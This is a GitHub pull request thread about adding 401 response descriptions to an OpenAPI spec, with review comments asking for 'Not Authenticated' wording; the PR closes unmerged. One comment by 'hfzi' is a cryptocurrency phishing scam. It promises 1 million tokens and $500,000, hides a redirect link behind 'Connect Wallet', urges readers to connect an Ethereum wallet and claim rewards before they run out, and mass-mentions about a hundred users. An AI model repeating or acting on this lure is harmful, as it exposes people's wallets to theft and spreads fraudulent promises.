### PR TITLE
Update openapi.yaml

### PR DESCRIPTION
**Pull request by MidoBr**

### CODE REVIEW

**Comment by ShotaKameyama** [comment]
Thank you @MidoBr ! Your file still includes auth_token explanation. 
Please see the file changed for more details.

File: openapi.yaml [hunk 1]
```diff
@@ -215,14 +217,16 @@ paths:
             application/json:
               schema:
                 $ref: '#/components/schemas/ListReportResponse'
+        401:
+          description: Invalid credentials
```
Comment (ShotaKameyama) [inline openapi.yaml]: Can you change this to `description: Not Authenticated`

File: openapi.yaml [hunk 2]
```diff
@@ -175,14 +175,16 @@ paths:
             application/json:
               schema:
                 $ref: '#/components/schemas/SuccessResponse'
+        401:
+          description: Invalid credentials
```
Comment (ShotaKameyama) [inline openapi.yaml]: Can you change this to `description: Not Authenticated`

File: openapi.yaml [hunk 3]
```diff
@@ -261,14 +265,16 @@ paths:
             application/json:
               schema:
                 $ref: '#/components/schemas/ListReportResponse'
+        401:
+          description: Invalid credentials
```
Comment (ShotaKameyama) [inline openapi.yaml]: Can you change this to `description: Not Authenticated`

File: openapi.yaml [hunk 4]
```diff
@@ -301,14 +307,16 @@ paths:
             application/json:
               schema:
                 $ref: '#/components/schemas/SuccessResponse'
+        401:
+          description: Invalid credentials
```
Comment (ShotaKameyama) [inline openapi.yaml]: Can you change this to `description: Not Authenticated`

**Comment by ShotaKameyama** [comment]
@MidoBr Also please update the redoc-static.html as well.

File: openapi.yaml (hunk 1 above)
Comment (MidoBr) [reply openapi.yaml]: Sure!

**Comment by hfzi** [comment]
[Banner](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
pablasso, @xleox, @espumita, @Salmooo, @robot-oekonom, @jamwine, @AndreMiras, @Number16BusShelter, @jvalinsky, @JohnSweeney85, @MasonLyons, @longxiaofei, @larsyngvelundin, @lab18x, @ashishgopalhattimare, @nowa, @gulbinas, @rbmarliere, @luisgagocasas, @zaffrew, @Marknetreba, @yu-shin, @carsonlecky, @Zaczero, @Zoexyz77, @Daft-Wullie, @clrke, @jaxon4004, @mon-key-mike, @rahulgoel97, @mgaitan, @mdn522, @picoAMPERE, @sediri-code, @irockstar, @CaioTeixeira95, @mishidemudong, @mpdevilleres, @DreamAndDead, @nesclass, @kevinqz, @0xYYY, @suixinio, @Rhyanz46, @sarthakkaushik, @eaxecloud, @dushyantRathore, @anylayer, @emmajam, @novice-stackquancunlau, @lymweb, @beaugunderson, @matt-Yendys, @jacobo3d, @vincestorm, @milap573, @CodeWithEmad, @highwayliu, @salsal3, @riusricardo, @walidmujahid, @harrywang, @laibe, @jkg77, @void-gfly, @ryandotsmith, @dreamxyp, @kkpan11, @langdangren, @cryptoadu, @kimpers, @lovehhf, @youngbob6711, @mimizhang, @10cks, @AlexWaker, @ChristianWilkie, @luzihang123, @aman-rac, @LIPUU, @KevinRamsunder, @hhuhhu, @discrete-void, @ttgb, @tnh-co, @burakkahveci, @victorray84, @johnpatrickroach, @Cheban1996, @fransixles, @garlicbulb-puzhuo, @cgebe, @zhenhua32, @0xxfu, @daimons, @gofullthrottle, @jack201901, @teoz-fund, @the-veloper

**Pull request closed without merging**